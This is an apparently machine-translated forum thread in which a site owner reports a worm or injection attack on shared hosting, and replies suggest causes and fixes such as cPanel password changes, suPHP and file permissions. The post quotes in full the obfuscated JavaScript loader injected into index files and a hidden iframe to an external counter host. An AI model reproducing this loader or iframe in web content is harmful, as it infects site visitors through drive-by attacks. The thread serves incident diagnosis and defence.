有没有其他人最近看到这个问题呢? 我有几个网站下来这个错误。
Parse error: syntax error, unexpected '<' in /home/public_html/index.PHP on line 39 这是由蠕虫/注入攻击造成的,它在整个任何index.php / index.html文件中都可以随意转储下面的代码:
<html><body><script>date=new Date();var ar="Aw'zg>lpNu1m<0]c;erCy,aTnhE={s}i B() :[.\"ofbvdt/";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f108,0,-15,33,-30,6,33,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,63,-21,24,0,0,-15,33,-72,12,-33,18,3,48,3,-57,60,0,-18,6,-45,-33,69,-36,45,-12,24,0,0,27,-12,-78,-18,6,18,21,66,-21,-114,51,39,45,-87,51,18,-84,57,33,-72,12,-33,18,45,-9,-33,-9,36,-75,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,90,-93,90,42,3,-63,6,-75,24,9,-33,90,-21,-24,42,-81,63,63,-57,-75,24,9,-33,90,-9,51,-78,-42,33,30,-75,126,-39,-6,6,36,-36,-75,75,45,-78,51,-36,18,42,0,-84,21,-24,-27,102,-36,6,45,-45,30,-51,39,-45,63,-42,36,-105,9,111,-87,-3,-30,33,75,12,-27,-72,9,90,-15,-102,90,-72,9,-42,9,21,105,-48,33,-72,12,-33,18,-36,105,-15,-57,60,0,-18,18,0,18,-99,45,-27,93,-45,30,-51,24,-3,33,-72,12,-33,18,3,48,3,-21,24,0,0,24,-66,-12,42,30,-30,-15,15,39,-12,-78,-18,6,18,21,66,-21,-72,9,-3,15,72,-87,27,-60,33,-18,18,21,66,-36,-96,87,33,-72,12,-33,18,-45,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,81,-33,-9,-39,57,-57,69,63,0,-117,90,30,0,-96,78,-96,45,66,-87,3,33,51,-72,72,-51,30,-72,-36,108,-72,0,96,-96,78,-96,45,66,-87,3,63,-42,63,-105,-27,99,-57,78,-9,-30,51,-78,-42,33,66,15,-39,-6,6,36,-36,-75,75,45,-78,21,-75,69,18,42,0,-84,21,-66,42,78,-9,-30,51,-78,-42,33,66,-96,102,-36,6,45,-45,30,-51,9,-75,60,63,-42,36,-105,9,111,-87,-45,42,78,-9,-30,51,-78,-42,33,66,-99,33,75,12,-57,-75,33,-33,42,78,-9,-30,51,-78,-42,33,66,21,-15,-102,60,-75,33,-33,42,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,-3,90,42,3,-63,-69,57,-57,24,9,-33,99,-57,78,-9,-30,-36,87,-138,138,0,-84,39,36,-102,111,-87,51,-96,69,-24,42,-81,63,63,-132,57,-57,24,9,-33,99,-57,60,0,0,27,-12,-78,-18,6,18,21,66,-21,-105,39,87,-60,-60,33,-18,18,21,66,-51,12,-39,9,-3,-54,12,42,-33,18,51,-96,123,-6,12,-75,-54,99,9,-75,3,75,-51,-45,0,30,21,63,-78,18,18,-75,117,-33,24,-21,-57,60,0,-18]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</script></body></html>
代码一味地插入一个JavaScript来源的iFrame:
<iframe height="10" width="10" src="http://counterstats.cz.cc/counter.htm" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
我试图撕毁网站,看看这是怎么发生的,但是有谁知道这是什么具体的攻击,以及它如何传播? 漏洞未修补的代码,CPanel本身,破解密码,根服务器?
编辑
我一直无法确切知道这里发生了什么,但看起来这是一个CPanel的事情 – 更改CPanel中的所有密码似乎停止重复攻击。 我已经在这个状态下留下了一个不重要的网站(没有清除网站代码),这是绝对正确的,而在每天都被损坏之前。 联系UK2.net和JustHost了解这一点,但至今没有回应。
它也似乎public_html文件夹和一些其他“系统”文件夹奇怪地chmod'd – 很多777应该不是。 在这方面迄今还没有任何回应。
编辑
看起来是“Trojan.JS.Agent.bur”试图找出更多…
这听起来像你的网站已经成为一个蠕虫的注射HTML /代码到您的文件的受害者。 下次发布有问题的代码,可以进行分析。 同时,您应该确保所有的应用程序和系统库都与最新的安全补丁保持同步。
你正在运行共享主机环境,还是你是客户?
可能发生的事情是服务器正在同一用户下运行每个用户代码(可能是“apache”或“httpd”)。 然后,所有这一切都是机器上任何客户的一个易受攻击的脚本,每个人都被黑客攻击。
如果你不是这台服务器的运营商,那么你可以做的很less。 你可以尝试把所有的事情都调整到755,并确保所有的东西都是你的用户,而不是'apache'或'nobody'。 但是,这只会阻止您的文件被修改。 攻击者仍然可以读取所有文件(例如,您的数据库凭据)。 除非你能说服你的主机更改为suPHP或类似,否则我强烈build议尽快寻找另一个主机。
如果您是主机,请重新构buildapache(使用easyapache),并启用suPHP选项。 然后你需要将每个用户的文件chown由自己的用户拥有,然后chmod然后为755. suPHP将把每个用户的代码作为自己的用户运行,这将防止这种types的攻击。
它要么通过SQL注入注入您的网站的数据库,要么通过在线文件pipe理器上传/利用。 我已经看到这种情况发生了无数次,通常在所有文件中都是通过基于Web的文件pipe理来执行的。
不用说,既然你还没有得到主持人的回应,我还是开始寻找一个新的公司。
除非他们(和你确定)恢复最近的干净的副本,否则你很可能会被困在手动清理中。 我仍然考虑转移到另一家公司,因为他们的反应慢。